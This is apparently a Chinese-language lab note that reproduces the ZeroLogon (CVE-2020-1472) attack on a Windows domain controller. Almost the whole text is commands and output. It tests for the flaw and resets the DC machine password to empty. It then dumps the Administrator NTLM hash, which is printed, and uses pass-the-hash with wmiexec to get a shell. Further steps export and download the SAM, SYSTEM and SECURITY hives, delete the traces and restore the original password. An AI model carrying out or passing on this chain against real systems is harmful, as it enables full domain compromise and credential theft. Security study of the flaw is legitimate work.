CVE-2020-1472-ZeroLogon

复现

检测是否存在 zerologin 

python3 zerologon_tester.py ad01 192.168.145.134

Performing authentication attempts...

Success! DC can be fully compromised by a Zerologon attack.

置空DC的密码

python3 cve-2020-1472-exploit.py ad01 192.168.145.134

获取HASH

python3 secretsdump.py redteam.club/ad01\$@192.168.145.134 -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6:::

利用wmiexec.py登录

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 administrator@192.168.145.134 "whoami"

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 redteam.club/administrator@192.168.145.134     //hash获取shell

python3 wmiexec.py administrator:p-0p-0p-0@192.168.145.134   //明文获取shell

导出SAM

reg save HKLM\SYSTEM system.save          #导出注册表
reg save HKLM\SAM sam.save             #导出注册表
reg save HKLM\SECURITY security.save     #导出注册表
get system.save             #下载至本地
get sam.save             #下载至本地
get security.save             #下载至本地
del /f system.save            #远程删除导出的注册表文件
del /f sam.save             #远程删除导出的注册表文件
del /f security.save exit        #远程删除导出的注册表文件

获取hash

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

恢复原HASH

python3 reinstall_original_pw.py ad01 192.168.145.134 3730c3ee5ccba0338506ab75e84cf8fe081d4ca661528e33749053c79000926eb280815645ba53a15b058820dd301abf33f82edba4b5a9ae49229714c4329e7bf0ba3e75b9b92cf294cd456bc195b93b1c7946b51d276e5c91c33545109acfcc72afca6fb12872f2170410bc5a9feefec4764d608751a47213faca4fdca2bbc4509a9e3b22aeb9e2d57acb3f3466d3f4c286e4b0fbec9a98b16237c9d5072963136b61a20c52ae0b4cc5e534a55bd31afc94482f1e73c87e9f00d3af41f06e50db549baa939e7028d52e189b01c3f5950ce07f7a882212db6fc27958a34e485980172f76117ea40b01b84ea9a878ef80

检测域密码

python3 secretsdump.py ad01.redteam.club/administrator@192.168.145.134  -hashes :9099d68602a60f007c227c4fa95fada6